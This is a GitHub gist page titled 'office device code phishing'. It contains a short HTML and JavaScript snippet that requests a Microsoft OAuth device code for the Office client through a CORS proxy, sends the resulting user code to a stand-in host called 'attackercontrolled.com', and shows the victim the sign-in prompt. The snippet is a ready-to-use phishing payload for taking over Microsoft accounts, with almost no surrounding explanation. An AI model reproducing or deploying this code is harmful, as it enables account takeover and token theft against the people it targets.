Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
office device code phishing
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.user_code);
document.write(data.message);
});
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment